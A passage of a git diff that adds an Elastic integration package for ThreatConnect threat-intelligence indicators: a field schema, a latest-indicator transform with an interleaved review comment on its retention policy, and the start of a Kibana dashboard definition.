+ - name: document + type: group + fields: + - name: date_added + type: date + description: Date and time when the document was added. + - name: type + type: keyword + description: The type of document. + - name: down_vote_count + type: keyword + description: Downvote Intel Rating. + - name: due_date + type: date + description: The date and time when the Task is due. + - name: email_date + type: date + description: The date associated with an email. + - name: escalation_date + type: date + description: The date and time when the Task should be escalated. + - name: event_date + type: date + description: The date and time when the Event took place. + - name: external + type: group + fields: + - name: date + type: group + fields: + - name: added + type: date + description: The date and time when the Group was created externally. + - name: expires + type: date + description: The date and time when the Group expires externally. + - name: last_modified + type: date + description: The date and time when the Group was last modified externally. + - name: file + type: group + fields: + - name: name + type: keyword + description: The file name of the Document. + - name: size + type: keyword + description: The File size of the document. + - name: text + type: keyword + description: The file text of the Signature. + - name: type + type: keyword + description: The file type of the SignaturePossible values are Bro,ClamAV,CybOX,Iris Search Hash,KQL,OpenIOC,Regex,SPL,Sigma,Snort,Suricata,TQL Query,YARA. + - name: first_seen + type: date + description: The date and time when the Group was first seen. + - name: from + type: keyword + description: The Emails subject. + - name: generated_report + type: boolean + description: Indicates whether the report is generated. + - name: header + type: keyword + description: The Emails header. + - name: id + type: keyword + description: Unique Identifier of Group. 
+ - name: last_modified + type: date + description: Date and time when the document was last updated. + - name: last_seen + type: date + description: The date and time when the Group was last seen. + - name: legacy_link + type: keyword + description: Legacy link to the group's details in the ThreatConnect web application. + - name: malware + type: boolean + description: Indicates whether the Document is malware. + - name: name + type: keyword + description: The Groups name. + - name: owner + type: group + fields: + - name: id + type: keyword + description: The ID of the owner to which the Group belongs. + - name: name + type: keyword + description: The name of the owner to which the Group belongs. + - name: password + type: keyword + description: The password associated with the Document. + - name: publish_date + type: date + description: The date and time when the Report was published. + - name: reminder_date + type: date + description: The date and time when a reminder about the Task will be sent. + - name: score_breakdown + type: keyword + description: A breakdown or explanation of the score, providing additional information about how the score was determined. + - name: score_includes_body + type: boolean + description: Indicates whether the score includes information from the email body. + - name: status + type: keyword + description: The status of the Group type. + - name: subject + type: keyword + description: The Emails From field. + - name: to + type: keyword + description: The receiver email address. + - name: type + type: keyword + description: The type of Group being created.Possiblevalues:Adversary,AttackPattern,Campaign,CourseofAction,Document,Email,Event,Incident,IntrusionSet,Malware,Report,Signature,Tactic,Task,Threat,Tool, Vulnerability. + - name: up_vote + type: boolean + description: Use this field to update the Groups Intel Rating. + - name: up_vote_count + type: keyword + description: Upvote Intel Rating. 
+ - name: web_link + type: keyword + description: Link to the group's details in the ThreatConnect web application. + - name: xid + type: keyword + description: The Groups XID. + - name: associated_indicators + type: group + fields: + - name: data + type: group + fields: + - name: active + type: group + fields: + - name: locked + type: boolean + description: Indicates whether the active status is locked. + - name: value + type: boolean + description: Indicates whether the indicator is active. + - name: address + type: keyword + description: The email address associated with the Email Address Indicator. + - name: as_number + type: keyword + description: The AS number associated with the ASN Indicator. + - name: block + type: keyword + description: The block of network IP addresses associated with the CIDR Indicator. + - name: confidence + type: long + description: The Indicators Confidence Rating. + - name: date_added + type: date + description: Date and time when the indicator was added. + - name: description + type: keyword + description: Description of the indicator. + - name: dns_active + type: boolean + description: Indicates whether the DNS feature is active for the Host Indicator. + - name: external + type: group + fields: + - name: date + type: group + fields: + - name: added + type: date + description: The date and time when the Indicator was created externally. + - name: expires + type: date + description: The date and time when the Indicator expires externally. + - name: last_modified + type: date + description: The date and time when the Indicator was last modified externally. + - name: first_seen + type: date + description: The date and time when the Indicator was first seen. + - name: hashtag + type: keyword + description: The hashtag term associated with the Hashtag Indicator. + - name: host_name + type: keyword + description: The host name associated with the Host Indicator. 
+ - name: id + type: keyword + description: Unique identifier for the indicator. + - name: ip + type: ip + description: The IP address associated with the Address Indicator. + - name: key_name + type: keyword + description: The name of the registry key associated with the Registry Key Indicator. + - name: last_modified + type: date + description: Date and time when the indicator was last modified. + - name: last_seen + type: date + description: The date and time when the Indicator was last seen. + - name: legacy_link + type: keyword + description: Legacy link to the indicator's details in the ThreatConnect web application. + - name: md5 + type: keyword + description: MD5 hash value associated with the indicator. + - name: mutex + type: keyword + description: The synchronization primitive used to identify malware files that is associated with the Mutex. + - name: owner + type: group + fields: + - name: id + type: keyword + description: Identifier for the owner of the indicator. + - name: name + type: keyword + description: Name of the organization that owns the indicator. + - name: private_flag + type: boolean + description: Indicates whether the indicator is marked as private. + - name: rating + type: double + description: The Indicators Threat Rating. + - name: sha1 + type: keyword + description: The SHA1 hash associated with the File Indicator. + - name: sha256 + type: keyword + description: The SHA256 hash associated with the File Indicator. + - name: size + type: keyword + description: The size of the file associated with the File Indicator. + - name: subject + type: keyword + description: The subject line of the email associated with the Email Subject Indicator. + - name: summary + type: keyword + description: Summary or description of the indicator. + - name: text + type: keyword + description: The URL associated with the URL Indicator. + - name: type + type: keyword + description: Type of the indicator. 
+ - name: user_agent_string + type: keyword + description: The characteristic identification string associated with the User Agent Indicator. + - name: value + type: group + fields: + - name: name + type: keyword + description: The registry value associated with the Registry Key Indicator. + - name: type + type: keyword + description: Possible values:REG_NONE,REG_BINARY,REG_DWORD,REG_DWORD_LITTLE_ENDIAN,REG_DWORD_BIG_ENDIAN,REG_EXPAND_SZ,REG_LINK,REG_MULTI_SZ,REG_QWORD,REG_QWORD_LITTLE_ENDIAN,REG_SZ. + - name: web_link + type: keyword + description: Link to the indicator's details in the ThreatConnect web application. + - name: whois_active + type: boolean + description: Indicates whether the Whois feature is active for the Host Indicator. + - name: attributes + type: group + fields: + - name: data + type: group + fields: + - name: created_by + type: group + fields: + - name: first_name + type: keyword + description: First name of the user who created the victim attribute. + - name: id + type: keyword + description: Unique Identifier of the user who created the attribute. + - name: last_name + type: keyword + description: Lastname of the user who created the victim attribute. + - name: owner + type: keyword + description: Owner of attribute creator. + - name: pseudonym + type: keyword + description: Pseudonym or alias of the user. + - name: user_name + type: keyword + description: Username of the user who created the victim attribute. + - name: date_added + type: date + description: Date and time when the attribute was added. + - name: default + type: boolean + description: Indicates whether the Attribute is the default Attribute of its type for the Indicator to which it is added (this field applies to certain Attribute and data types only). + - name: id + type: keyword + description: Unique Identifier of attribute. + - name: last_modified + type: date + description: Date and time when attribute was modified. 
+ - name: pinned + type: boolean + description: Indicates whether the Attribute is to be displayed as a Pinned Attribute on the Details screen for the Indicator to which the Attribute is added. + - name: source + type: keyword + description: The Attributes source. + - name: type + type: keyword + description: The Attributes type. + - name: value + type: keyword + description: The Attributes value. + - name: block + type: keyword + description: The block of network IP addresses associated with the CIDR Indicator. + - name: confidence + type: long + description: The Indicators Confidence Rating. + - name: custom_associations + type: flattened + description: Includes indicators with custom associations to the indicator. + - name: date_added + type: date + description: Date and time when the indicator was added. + - name: deleted_at + type: date + description: Date when the IOC was expired/deleted. + - name: description + type: keyword + description: Description of the indicator. + - name: dns_active + type: boolean + description: Indicates whether the DNS feature is active for the Host Indicator. + - name: dns_resolution + type: flattened + description: Includes DNS resolution data related to the Host indicators. + - name: enrichment + type: flattened + description: Includes Enrichment data related to the indicator. + - name: expiration_duration + type: keyword + description: Duration when the IOC will expire. + - name: external + type: group + fields: + - name: date + type: group + fields: + - name: added + type: date + description: The date and time when the Indicator was created externally. + - name: expires + type: date + description: The date and time when the Indicator expires externally. + - name: external_last + type: group + fields: + - name: modified + type: date + description: The date and time when the Indicator was last modified externally. 
+ - name: false_positive_reported_by_user + type: boolean + description: Indicates whether false positive is reported by user. + - name: false_positives + type: long + description: Count of false positives. + - name: file_actions + type: flattened + description: A list of File Actions associated with the File Indicator. + - name: file_occurrences + type: flattened + description: A list of File Occurrences associated with the File Indicator. + - name: first_seen + type: date + description: The date and time when the Indicator was first seen. + - name: generic_custom_indicator_values + type: flattened + description: 'Includes the fields over-writing the custom field names: value1, value2, and value3.' + - name: geo_location + type: flattened + description: Includes GEO location information related to the Host and IP indicators. + - name: hashtag + type: keyword + description: The hashtag term associated with the Hashtag Indicator. + - name: host_name + type: keyword + description: The host name associated with the Host Indicator. + - name: id + type: keyword + description: Unique identifier for the indicator. + - name: investigation_links + type: flattened + description: Includes investigation links related to the indicator type. + - name: ip + type: ip + description: The IP address associated with the Address Indicator. + - name: key_name + type: keyword + description: The name of the registry key associated with the Registry Key Indicator. + - name: last_false_positive + type: date + description: Date and time of last false positive. + - name: last_modified + type: date + description: Date and time when the indicator was last modified. + - name: last_seen + type: date + description: The date and time when the Indicator was last seen. + - name: legacy_link + type: keyword + description: Legacy link to the indicator's details in the ThreatConnect web application. + - name: md5 + type: keyword + description: MD5 hash value associated with the indicator. 
+ - name: mutex
+ type: keyword
+ description: The synchronization primitive used to identify malware files that is associated with the Mutex.
+ - name: observations
+ type: flattened
+ description: Includes the Observations fields.
+ - name: owner
+ type: group
+ fields:
+ - name: id
+ type: keyword
+ description: Identifier for the owner of the indicator.
+ - name: name
+ type: keyword
+ description: Name of the organization that owns the indicator.
+ - name: private_flag
+ type: boolean
+ description: Indicates whether the indicator is marked as private.
+ - name: rating
+ type: double
+ description: The Indicators Threat Rating.
+ - name: security_labels
+ type: group
+ fields:
+ - name: data
+ type: group
+ fields:
+ - name: color
+ type: keyword
+ description: Color associated with the security label.
+ - name: date_added
+ type: date
+ description: ' The date and time when the security label was added.'
+ - name: description
+ type: keyword
+ description: Description of the security label.
+ - name: id
+ type: keyword
+ description: Unique identifier for the security label.
+ - name: name
+ type: keyword
+ description: Actual name or label of the security classification.
+ - name: owner
+ type: keyword
+ description: The entity or system that owns or manages the security label.
+ - name: sha1
+ type: keyword
+ description: The SHA1 hash associated with the File Indicator.
+ - name: sha256
+ type: keyword
+ description: The SHA256 hash associated with the File Indicator.
+ - name: size
+ type: keyword
+ description: The size of the file associated with the File Indicator.
+ - name: source
+ type: keyword
+ description: The Indicators source.
+ - name: subject
+ type: keyword
+ description: The subject line of the email associated with the Email Subject Indicator.
+ - name: summary
+ type: keyword
+ description: Summary or description of the indicator.
+ - name: tags
+ type: group
+ fields:
+ - name: data
+ type: group
+ fields:
+ - name: description
+ type: keyword
+ description: The Tags description.
+ - name: id
+ type: keyword
+ description: Unique Identifier of tag.
+ - name: last_used
+ type: date
+ description: Date and time when tag was last used.
+ - name: name
+ type: keyword
+ description: Name of tag.
+ - name: owner
+ type: keyword
+ description: The Organization, Community, or Source to which the Tag belongs.
+ - name: platforms
+ type: group
+ fields:
+ - name: count
+ type: long
+ description: Count of platforms.
+ - name: data
+ type: keyword
+ description: Platform on which tag is added.
+ - name: technique
+ type: group
+ fields:
+ - name: id
+ type: keyword
+ description: Unique Identifier of tag technique.
+ - name: text
+ type: keyword
+ description: The URL associated with the URL Indicator.
+ - name: threat_assess
+ type: group
+ fields:
+ - name: confidence
+ type: double
+ description: The confidence level associated with the threat assessment.
+ - name: rating
+ type: double
+ description: A numerical rating indicating the threat assessment level.
+ - name: score
+ type: group
+ fields:
+ - name: false_positive
+ type: long
+ description: The count of false positives associated with the threat assessment score.
+ - name: observed
+ type: long
+ description: The observed value associated with the threat assessment score.
+ - name: value
+ type: long
+ description: The overall score assigned to the threat, indicating its severity or risk.
+ - name: tracked_users
+ type: flattened
+ description: Includes Observations and False Positive stats of tracked users.
+ - name: type
+ type: keyword
+ description: Type of the indicator (e.g., File, IP address).
+ - name: user_agent_string
+ type: keyword
+ description: The characteristic identification string associated with the User Agent Indicator.
+ - name: value
+ type: group
+ fields:
+ - name: name
+ type: keyword
+ description: The registry value associated with the Registry Key Indicator.
+ - name: type
+ type: keyword
+ description: Possible values:REG_NONE,REG_BINARY,REG_DWORD,REG_DWORD_LITTLE_ENDIAN,REG_DWORD_BIG_ENDIAN,REG_EXPAND_SZ,REG_LINK,REG_MULTI_SZ,REG_QWORD,REG_QWORD_LITTLE_ENDIAN,REG_SZ.
+ - name: web_link
+ type: keyword
+ description: Link to the indicator's details in the ThreatConnect web application.
+ - name: who_is
+ type: flattened
+ description: Includes WhoIs information related to the Host indicators.
+ - name: whois_active
+ type: boolean
+ description: Indicates whether the Whois feature is active for the Host Indicator.
diff --git a/packages/ti_threatconnect/elasticsearch/transform/latest/manifest.yml b/packages/ti_threatconnect/elasticsearch/transform/latest/manifest.yml
new file mode 100644
index 00000000000..f5296fd0c0a
--- /dev/null
+++ b/packages/ti_threatconnect/elasticsearch/transform/latest/manifest.yml
@@ -0,0 +1,18 @@
+start: true
+destination_index_template:
+ settings:
+ index:
+ sort:
+ field:
+ - "@timestamp"
+ order:
+ - desc
+ mappings:
+ dynamic: true
+ dynamic_templates:
+ - strings_as_keyword:
+ match_mapping_type: string
+ mapping:
+ ignore_above: 1024
+ type: keyword
+ date_detection: false
diff --git a/packages/ti_threatconnect/elasticsearch/transform/latest/transform.yml b/packages/ti_threatconnect/elasticsearch/transform/latest/transform.yml
new file mode 100644
index 00000000000..63e3dee8640
--- /dev/null
+++ b/packages/ti_threatconnect/elasticsearch/transform/latest/transform.yml
@@ -0,0 +1,35 @@
+# Use of "*" to use all namespaces defined.
+source:
+ index:
+ - "logs-ti_threatconnect.indicator-*"
+# The version suffix on the dest.index should be incremented if a breaking change
+# is made to the index mapping. You must also bump the fleet_transform_version
+# for any change to this transform configuration to take effect. The old destination
+# index is not automatically deleted. We are dependent on https://github.com/elastic/package-spec/issues/523 to give
+# us that ability in order to prevent having duplicate IoC data and prevent query
+# time field type conflicts.
+dest:
+ index: "logs-ti_threatconnect_latest.dest_indicator-1"
+ aliases:
+ - alias: "logs-ti_threatconnect_latest.indicator"
+ move_on_creation: true
+latest:
+ unique_key:
+ - event.dataset
+ - event.id
+ sort: '@timestamp'
+description: Latest Indicator data retrieved from ThreatConnect Indicator API.
+frequency: 30s
+sync:
+ time:
+ field: event.ingested
+ delay: 120s
+retention_policy:
+ time:
+ field: threat_connect.indicator.deleted_at
+ max_age: 1m
+_meta:
+ managed: true
+ # Bump this version to delete, reinstall, and restart the transform during package.
+ # Version bump is needed if there is any code change in transform.
+ fleet_transform_version: 0.1.0
diff --git a/packages/ti_threatconnect/img/threat-connect-indicator-dashboard.png b/packages/ti_threatconnect/img/threat-connect-indicator-dashboard.png
new file mode 100644
index 00000000000..4eae5fe4222
Binary files /dev/null and b/packages/ti_threatconnect/img/threat-connect-indicator-dashboard.png differ
diff --git a/packages/ti_threatconnect/img/threat-connect-logo.svg b/packages/ti_threatconnect/img/threat-connect-logo.svg
new file mode 100644
index 00000000000..bb30100adb6
--- /dev/null
+++ b/packages/ti_threatconnect/img/threat-connect-logo.svg
@@ -0,0 +1,7 @@
+
+
+
+
+
+
+
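Review bot: The retention policy keyed on `threat_connect.indicator.deleted_at` with `max_age: 1m` only prunes documents that actually carry a deleted_at value; any indicator the API never marks as deleted stays in the latest index for good, so stale IOCs will keep matching until the source explicitly expires them. If the intent is to age out expired indicators, the date-typed `external.date.expires` field declared in the fields file may be the better retention key, but this depends on what the ingest pipeline populates, so worth confirming before relying on it. A short comment above `retention_policy` stating which documents it removes and why would make the behaviour explicit, e.g. `# Only indicators explicitly marked deleted by ThreatConnect are removed; nothing else ages out.`. Separately, the `_meta` comment `# Bump this version to delete, reinstall, and restart the transform during package.` looks truncated and presumably should end with `package upgrade`.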
diff --git a/packages/ti_threatconnect/kibana/dashboard/ti_threatconnect-2d465f90-973d-11ee-839e-ef65b7014120.json b/packages/ti_threatconnect/kibana/dashboard/ti_threatconnect-2d465f90-973d-11ee-839e-ef65b7014120.json new file mode 100644 index 00000000000..8c0be7b931b --- /dev/null +++ b/packages/ti_threatconnect/kibana/dashboard/ti_threatconnect-2d465f90-973d-11ee-839e-ef65b7014120.json 
@@ -0,0 +1,1824 @@ +{ + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "negate": false, + "params": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "logs-*", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "ti_threatconnect.indicator" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "ti_threatconnect.indicator" + } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "logs-*", + "key": "labels.is_ioc_transform_source", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "labels.is_ioc_transform_source" + } + } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {} + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "Navigation\n\n[Integration Page](/app/integrations/detail/ti_threatconnect-0.1.0/overview)\n\nOverview\n\nThis dashboard shows Indicator overview related to the ThreatConnect Integration.\n\nThis dashboard is made to provide general statistics and show the detection of ingested indicators.\n\nIt provides details on overall indicators and their respective groups. 
Additionally, it showcases the categorization of indicators based on type and owner. The dashboard includes a breakdown of associated groups by type and status, indicator attributes categorized by type, indicators rated by rating and confidence levels. The report encompasses information on the count of indicators over time. Furthermore, it features the top 10 IP addresses, accessed URLs, and host details, along with associated groups and owners linked to each indicator.\n", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 27, + "i": "4ab25121-cec3-478d-b0e1-826a78ae7dcc", + "w": 13, + "x": 0, + "y": 0 + }, + "panelIndex": "4ab25121-cec3-478d-b0e1-826a78ae7dcc", + "title": "Table of Contents", + "type": "visualization" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-89f5dc3a-f57a-474d-be03-49659399fcbe", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "89f5dc3a-f57a-474d-be03-49659399fcbe": { + "columnOrder": [ + "a5e9c0fe-bc13-401c-b1f6-ccb3af9ed882" + ], + "columns": { + "a5e9c0fe-bc13-401c-b1f6-ccb3af9ed882": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Indicators", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "event.id" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "89f5dc3a-f57a-474d-be03-49659399fcbe", + "layerType": "data", + "metricAccessor": "a5e9c0fe-bc13-401c-b1f6-ccb3af9ed882" + } + }, + "title": "", + "type": 
"lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 13, + "i": "3ddaf7b4-453d-488c-a2ed-76a6cd318230", + "w": 17, + "x": 13, + "y": 0 + }, + "panelIndex": "3ddaf7b4-453d-488c-a2ed-76a6cd318230", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c3124540-fb37-497c-8e54-fe6206e27a29", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "c3124540-fb37-497c-8e54-fe6206e27a29": { + "columnOrder": [ + "ed0fe8ca-c12a-4b1e-9de7-bc7b91f4e611" + ], + "columns": { + "ed0fe8ca-c12a-4b1e-9de7-bc7b91f4e611": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Indicator Associated Groups", + "operationType": "unique_count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "threat_connect.indicator.associated_groups.data.id" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "c3124540-fb37-497c-8e54-fe6206e27a29", + "layerType": "data", + "metricAccessor": "ed0fe8ca-c12a-4b1e-9de7-bc7b91f4e611" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 13, + "i": "fcb4c79b-ae94-4f79-a280-319fe1ee0a77", + "w": 18, + "x": 30, + "y": 0 + }, + "panelIndex": "fcb4c79b-ae94-4f79-a280-319fe1ee0a77", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": 
"indexpattern-datasource-layer-421cfbca-ee3a-4ebb-9ac8-9bbdcd4eae81", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "421cfbca-ee3a-4ebb-9ac8-9bbdcd4eae81": { + "columnOrder": [ + "9596563f-edf9-4d32-a415-8da068813a73", + "75d72c9c-60c0-4db0-8b44-6df1ad966759" + ], + "columns": { + "75d72c9c-60c0-4db0-8b44-6df1ad966759": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "threat_connect.indicator.associated_groups.data.id" + }, + "9596563f-edf9-4d32-a415-8da068813a73": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "75d72c9c-60c0-4db0-8b44-6df1ad966759", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat_connect.indicator.associated_groups.data.type" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "75d72c9c-60c0-4db0-8b44-6df1ad966759" + ], + "layerId": 
"421cfbca-ee3a-4ebb-9ac8-9bbdcd4eae81", + "layerType": "data", + "seriesType": "bar", + "xAccessor": "9596563f-edf9-4d32-a415-8da068813a73" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false + }, + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "show" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "da4952b2-7a0a-47e6-8307-91fbeff1cd49", + "w": 17, + "x": 13, + "y": 13 + }, + "panelIndex": "da4952b2-7a0a-47e6-8307-91fbeff1cd49", + "title": "Indicator Associated Groups by Type [Logs ThreatConnect]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-216e8a8a-32b9-4fa8-857c-340f946e3d84", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "216e8a8a-32b9-4fa8-857c-340f946e3d84": { + "columnOrder": [ + "add30df5-779e-401a-bab2-a9ccde1fb90c", + "85319d9a-e831-4bf0-be78-8c06b2fbd0c9" + ], + "columns": { + "85319d9a-e831-4bf0-be78-8c06b2fbd0c9": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "threat_connect.indicator.associated_groups.data.id" + }, + "add30df5-779e-401a-bab2-a9ccde1fb90c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Status", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "85319d9a-e831-4bf0-be78-8c06b2fbd0c9", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + 
"parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat_connect.indicator.associated_groups.data.status" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "85319d9a-e831-4bf0-be78-8c06b2fbd0c9" + ], + "layerId": "216e8a8a-32b9-4fa8-857c-340f946e3d84", + "layerType": "data", + "position": "top", + "seriesType": "bar", + "showGridlines": false, + "xAccessor": "add30df5-779e-401a-bab2-a9ccde1fb90c" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false, + "showSingleSeries": false + }, + "preferredSeriesType": "bar", + "title": "Empty XY chart", + "valueLabels": "show" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "561f36d9-8bd8-4438-8670-292221db6ec3", + "w": 18, + "x": 30, + "y": 13 + }, + "panelIndex": "561f36d9-8bd8-4438-8670-292221db6ec3", + "title": "Associated Groups by Status [Logs ThreatConnect]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-961eaa59-f6c0-488d-a59d-4212ada370ae", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "961eaa59-f6c0-488d-a59d-4212ada370ae": { + "columnOrder": [ + "33d3e8e5-932c-4b9c-a525-5c3ea3361215", + "d27765e7-2a25-4eab-b8e5-b1ba23100918" + ], + "columns": { + "33d3e8e5-932c-4b9c-a525-5c3ea3361215": { + "customLabel": true, + "dataType": "number", + "isBucketed": true, + "label": "Rating", + 
"operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "d27765e7-2a25-4eab-b8e5-b1ba23100918", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat_connect.indicator.rating" + }, + "d27765e7-2a25-4eab-b8e5-b1ba23100918": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "d27765e7-2a25-4eab-b8e5-b1ba23100918" + ], + "layerId": "961eaa59-f6c0-488d-a59d-4212ada370ae", + "layerType": "data", + "position": "top", + "seriesType": "bar", + "showGridlines": false, + "xAccessor": "33d3e8e5-932c-4b9c-a525-5c3ea3361215" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false + }, + "preferredSeriesType": "bar", + "title": "Empty XY chart", + "valueLabels": "show" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "1cdedc22-76b1-44fa-9cf5-296d8ff7c09b", + "w": 24, + "x": 0, + "y": 27 + }, + "panelIndex": "1cdedc22-76b1-44fa-9cf5-296d8ff7c09b", + "title": "Indicator by Rating [Logs ThreatConnect]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": 
